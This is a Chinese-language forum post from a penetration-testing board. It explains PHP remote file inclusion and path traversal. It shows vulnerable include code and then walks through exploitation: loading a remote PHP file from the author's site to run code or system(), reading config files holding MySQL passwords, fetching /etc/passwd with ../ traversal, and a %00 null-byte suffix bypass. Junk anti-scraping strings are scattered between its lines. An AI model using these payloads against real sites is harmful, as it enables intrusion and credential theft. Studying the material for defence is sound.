中国网络渗透测试联盟
标题:
PHP远程包含
[打印本页]
作者:
admin
时间:
2012-9-15 14:06
标题:
PHP远程包含
1 q- H. W5 r0 l( T$ f! m' ^/ N
php远端档包含漏洞基本
f1 b7 z$ Y, }$ V) Z G1 ~6 c# h
这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。
2 V9 X: l/ n% J- O. Z7 ?
本帖隐藏的内容需要回复才可以浏览
4 T- `& ]* u" a) q# C8 x
首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。
; o3 ^$ b$ Q% \! S3 ^: F0 @
1.找出bug:
3 |: y, w% |8 V: r! N( E d7 E
为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
+ n4 F3 w7 z) X. D1 G& f
如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。
9 ]! v+ q' C$ v0 }3 [
我们先看这个,当用户输入通过后就包含档,也就是
6 c; [0 E K* c% F+ y) e1 i8 g# Z
if ($_GET) {
1 [: [$ @& r+ m) o' y
include $_GET;
, i$ l, B; | z( {& L
} else {
2 d5 g, b# q% b: U# P7 l% Q; M% g
include "home.php";
# r6 r e+ l8 k/ b! |
}
6 {+ Y9 ~. p7 ~0 g- ]! }, h
这种结构在动态网站里是常见的,问题是它允许这样
http://www.target.com
/explame.php?page=main.php或者
http://www.target.com/explame.php?
page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。
. \9 d8 y4 _7 H) E! ~- Q0 e
2.测试
( f9 x0 ?. M: N
这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的
7 ~2 p0 s4 o1 E( N8 j" ^# X b+ j
http://www.target.com/explame.php?page=zizzy
5 I0 l3 w. F/ S9 m i6 [3 k. i" N
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
+ Y$ M9 G2 m& I& ]
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
; x5 \3 X- L3 p. U* b) g0 f8 z' K+ i; x
php输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。
- C# c( A0 D1 j$ W7 l; k9 p( j% E
3.利用
% I% N- t8 L9 s+ o( ^
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上
http://www.mysite.com/yeah.txt.
内容这样
8 `& w7 c2 q: s: f6 r1 C& w1 K/ t
<?
! _* U( l# r) n) H3 d [
echo "Wow,test!";
. B: @8 P# Y3 r) I, u
?>
5 r: z) r0 ]- b! s( r
那么
http://www.target.com/explame.php?pa...e.com/yeah.txt
4 _) B" F5 x" H6 X3 p
OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。
3 K" K3 O1 k9 Y5 X. f( Z
4.另一种
6 K0 m, a! ?! ]- M8 C+ o% s! B
有时程式师换种写法,写成这样,限制了包含范围
3 l5 l% @; f+ C, V4 j/ u% i
if ($_GET) {
1 A: {0 @' l/ B
include "$_GET.php";
; O( v7 w! c7 D3 L# X
} else {
4 G2 R) {1 W( d; H' _
include "home.php";
) H6 w$ u0 p0 g/ Y
}
/ I( q4 R" A% [; n' I' S
我们提交
http://www.target.com/explame.php?pa...e.com/yeah.txt
' K8 K9 @0 l, \
Warning: main(
http://www.mysite.com/yeah.txt.php
): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
3 t' ~# X$ T5 b0 q4 W6 \( \2 D* s' t
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3
) q% j4 I2 T0 T
包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
b) {& `- u2 X8 n' w1 k0 [
那passwd怎么办
3 ]2 J& Q' p; Y5 e2 d9 H1 R- v- D! e
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
Q+ d. W. d0 p
Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
& M1 t; c; {6 }3 h, v: }$ X. t% o
在这里使用个NUL字元,也就是%00来跳过检测
& @; `5 G, q5 T |
http://www.target.com/explame.php?pa.../etc/passwd%00
9 r8 |3 s2 w" U) h: g
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2